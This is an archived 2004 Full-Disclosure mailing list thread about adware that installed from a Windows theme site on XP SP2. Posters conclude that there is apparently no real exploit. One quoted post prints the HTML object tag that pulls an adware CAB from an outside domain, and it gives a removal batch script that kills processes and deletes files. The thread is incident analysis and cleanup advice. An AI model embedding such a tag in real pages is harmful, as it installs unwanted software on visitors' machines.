lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: iamafraud at hotmail.com (Geraldo Rivera)
Subject: Spyware installs ... XP SP2 box

Thanks to everybody for all the info posted here. I wish I had a machine 
available right now to set up a vanilla SP2 install so I could witness the 
results of visiting the site again myself.

I did indeed say that I have visited the site in the past. However, I hadn't 
in a number of months prior to this visit. I also did not discover any 
adware/spyware that was installed on my machine prior to 10/2 (nor did 
ad-aware, spybot, or pest-patrol). I trust in the info that has been posted 
here, I just wish that I could witness it myself. I am very cautious when 
surfing (I know somebody is going to tell me not cautious enough since I am 
still using IE) so I am wondering what could have been installed prior to 
this visit that allowed this install to happen without any interaction.

Regardless, thanks again to everybody for the good info, and a big fuck you 
to themexp.org.


>From: "Castigliola, Angelo" <ACastigliola@...mprovident.com>
>To: "raize" <raize@...vito.com>, <full-disclosure@...ts.netsys.com>
>Subject: RE: [Full-Disclosure] Spyware installs ... XP SP2 box
>Date: Tue, 5 Oct 2004 12:11:24 -0400
>
>Thank you for the test Raize. I appreciate your time.
>
> >One must assume that you are installing these "theme packs" via some
>BHO (Browser Helper Object) that you
> >installed previously or put the site on the "Always trust content from
>this provider". Perhaps someone
> >else can explain where I am missing the exploit, because a quick glance
>over seems to indicate there is
> >none for XP SP2. (I did not test this on SP1)
>
>I think you are right. It seems the only person that was not prompted
>for the install that was not running SP2 was the original author of this
>thread who said that it was a previously visited site.
>
>As far as users running SP1 there is no security warning that says an
>executable is about to be installed. There is no Microsoft Update that
>will prevent this from loading. Like most large organizations just
>jumping to SP2 is not an option. It needs go though rigorous testing to
>make sure it complies with all of our internal software.
>
>Angelo Castigliola III
>Operations Technical Analyst I
>UnumProvident IT Services
>207.575.3820
>-----Original Message-----
>From: full-disclosure-admin@...ts.netsys.com
>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of raize
>Sent: Tuesday, October 05, 2004 9:29 AM
>To: full-disclosure@...ts.netsys.com
>Subject: Re: [Full-Disclosure] Spyware installs ... XP SP2 box
>
>
>The installed code is definitely:
>
><object id="DDownload_UL1"
>classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
>codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
>HEIGHT=0 WIDTH=0></object>
>
>However, there is no exploit here. I loaded this with a default honeypot
>image of XPSP2 with IE as an Admin and nothing else installed other than
>the drop down that asked me if I really wanted to trust this site for
>installing an executable.
>
>One must assume that you are installing these "theme packs" via some BHO
>(Browser Helper Object) that you installed previously or put the site on
>the "Always trust content from this provider". Perhaps someone else can
>explain where I am missing the exploit, because a quick glance over
>seems to indicate there is none for XP SP2. (I did not test this on SP1)
>
>Spybot and Ad-aware do not catch and kill WinRebates and WinAd
>spy/adware properly, but I have a batch command that will do it for you.
>Included is a .zip of each IP contacted along with full URL request and
>output. It also contains the contents of this email and the batch file
>with these commands: (You'll want to rename the .txt to .bat)
>
>--------------------------------------------
>cd "C:\Program Files\Winad Client"
>taskkill /T /F /IM WinClt.exe
>taskkill /T /F /IM WinAd.exe
>erase WinClt.exe
>erase WinAd.exe
>cd ..
>cd Web_Rebates
>taskkill /T /F /IM WebRebates0.exe
>taskkill /T /F /IM WebRebates1.exe
>erase WebRebates0.exe
>erase WebRebates1.exe
>cd ..
>rd /Q /S "Winad Client"
>rd /Q /S "Web_Rebates"
>cd "C:\Windows\system32"
>taskkill /T /F /IM fjdria.exe
>taskkill /T /F /IM ezSP_Px.exe
>erase fjdria.exe
>erase ezSP_Px.exe
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ